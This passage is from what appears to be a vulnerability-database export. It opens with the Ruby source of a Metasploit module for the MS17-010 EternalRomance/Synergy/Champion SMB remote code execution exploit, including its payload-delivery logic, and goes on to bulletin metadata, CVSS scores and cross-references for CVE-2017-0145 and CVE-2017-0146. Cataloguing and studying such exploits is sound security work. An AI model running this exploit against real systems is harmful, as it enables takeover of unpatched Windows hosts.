Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. 
From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn\n service_filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\n service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''\n\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n 
handler\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "47b769fdc546934555b5b0069a032cde"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "b1b79302e85cd03f0ea3818121409a3e"}, {"key": "references", "hash": "7bc839b0566b34ac03da233f997066ff"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": 
"0f387fb9bc28015146a12fe47c73e11c"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:ILITIES/MSFT-CVE-2017-0145/", "hash": "64347397548b2445d390ef54a8eff89959982ad00d9064a38071ba0d059300a1", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft CVE-2017-0145: Windows SMB Remote Code Execution Vulnerability", "description": "\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-04-14T05:31:31", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T05:31:31", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", 
"THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-04-14T05:31:31", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "db9f98f1067d08a43891fea7979bb2413b0b5087c2647f74f4e447483a2e4dba", "hashmap": [{"hash": "e41c633535127bd51fec6e5a3103a16c", "key": "title"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": 
"708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "68b329da9893e34099c7d8ad5cb9c940", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}], "history": [], "href": "", "id": "MSF:ILITIES/MSFT-CVE-2017-0145/", "immutableFields": [], "lastseen": "2021-04-14T05:31:31", "modified": "1976-01-01T00:00:00", "objectVersion": "1.5", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "title": "Microsoft CVE-2017-0145: Windows SMB Remote Code Execution Vulnerability", "type": "metasploit", "viewCount": 17}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-04-14T05:31:31"}], "viewCount": 64, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", 
"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "qualysblog", "idList": 
["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-14T05:31:31", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-04-14T05:31:31", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "68b329da9893e34099c7d8ad5cb9c940"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": 
"501b99596c4a2791b470cf17dc7209c2"}, {"key": "published", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "e41c633535127bd51fec6e5a3103a16c"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:ILITIES/MSFT-CVE-2017-0146/", "hash": "306096e3ea0bd0d368cfbf93c4f05bede979388be7e4a5eae1e750d684466bb2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft CVE-2017-0146: Windows SMB Remote Code Execution Vulnerability", "description": "\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-04-14T05:32:32", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T05:32:32", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", 
"SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0146"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-04-14T05:32:32", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "64e46c7b1840d7210cbf47ecda6ac296bd6891343803ded8f1f12038ae77e175", "hashmap": [{"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": 
"cvelist"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "a74ddd3940ba1da67e7250cb861f505d", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "68b329da9893e34099c7d8ad5cb9c940", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}], "history": [], "href": "", "id": "MSF:ILITIES/MSFT-CVE-2017-0146/", "immutableFields": [], "lastseen": "2021-04-14T05:32:32", "modified": "1976-01-01T00:00:00", "objectVersion": "1.5", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "title": "Microsoft CVE-2017-0146: Windows SMB Remote Code Execution Vulnerability", "type": "metasploit", "viewCount": 17}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-04-14T05:32:32"}], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", 
"idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-14T05:32:32", 
"rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-04-14T05:32:32", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": 